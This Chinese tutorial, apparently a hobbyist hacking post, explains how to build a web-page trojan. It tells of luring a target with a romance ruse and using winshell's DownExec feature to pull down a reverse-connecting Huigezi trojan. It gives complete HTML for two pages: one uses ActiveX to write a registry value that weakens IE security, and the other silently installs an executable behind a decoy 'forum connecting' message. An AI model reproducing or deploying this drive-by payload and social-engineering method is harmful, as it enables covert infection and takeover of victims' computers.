网页木马的惯用制作方法

    今天早上刚到学校，就有个同学对我说他的QQ被别人盗了！（这还了得？欺负到我哥们的头上来啦。）我于是对他说：“放心，包在我身上，我肯定给你找回来！”其实我心里也没底，对方既然能偷OICQ，那么多少会有点安全意识的！

    放学回家后，打开我的QQ，看到同学的头像正好亮着，查一下IP，好像和我在同一个城市。根据后边的端口号初步判断这家伙可能是在网吧（因为不是默认的4000，4001或5000）。我放弃了入侵他的念头，因为我们这里的网吧大部分用的是98，而98又很难入侵，所以我决定换一种方法。

    经过20多分钟的苦思冥想终于被我想到了一种方法（不要夸我办事效率高哦）。要让他浏览网页，然后染上木马。之后就…………

    但这里有三个问题需要解决：1，如何让对方乖乖的浏览网页。

    2，对方在局域网内，用普通的木马肯定不行。

    3，如果木马的服务端过大，很容易被发现。

    其实第一个问题很容易解决，只要装作一个清纯MM或GG欺骗对方感情就行了。第二条也不算太难，用个反弹式的木马就行了。但这第三条却不太容易解决，因为现在的反弹木马最小的也要30多KB，如果把它放在网页上让对方浏览的话，肯定会出现一个下载框在屏幕上“晃悠”半天。但经过我前面20多分钟的思考，我终于想出了如下的解决办法：1，申请一个主页空间。

    2，配置winshell5.0的服务端。你也许会问，这个木马并不是反弹式的木马啊，为什么要用它呢？别急，我之所以要用它的原因有二。一是它的服务端非常的小，才5KB左右。二是因为它里面有一个非常有用的功能。（如图一所示）看到我用红色圈起来的那部分了么？那就是我说的有用的功能，其中DownExec的意思是：“当winshell运行的时候自动下载可执行文件并运行。”Url Address是可执行文件的地址。Destination Filename是下载后的文件名。那么，当对方运行了我们配置好的winshell的时候，就可以让他神不知鬼不觉得去下载真正并且庞大的反弹式木马的服务端了！

    3，将winshell加再网页中，然后把网页，winshell，和命名为huigezi.exe的反弹木马服务端一起上传到xxx.abc.com/（我这里用的是灰鸽子）。

    之后我利用“美人计”让那小子乖乖的浏览了我的网页。图二就是证据！

    至于如何在网页中加入木马程序，在这里只说说我从网上找到的一种方法，其他的自己去研究吧！

    具体方法如下：开启第一个HTML的页面，通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项，变为“启用下栽未签名的ActiveX控件”，然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件，实质就是我们所要执行的EXE文件。

    将如下代码保存为index.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open(’http://xxx.abc.com/2.htm’,’colortext’)
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

下面制作2.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"hacker.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

　　其中hacker.exe就是我们要执行的文件。至于那个“论坛连接中请勿终断....”完全是为了迷惑对方，可根据自己喜好而定。接下来只要将index.htm，2.htm和hacker.exe一起上传到主页的同一目录中就ok了！
总结：这个方法的好处是，如果对方在局域网内，我们同样可以用木马进入他的机器并且很难发现。但这个方法也有自己的缺点，那就是用了两种木马，大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中，而我们这里的网吧大多又不安装杀毒软件（用硬盘还原卡代替），并且不升级IE，我这次入侵成功，网吧老板也有一份功劳！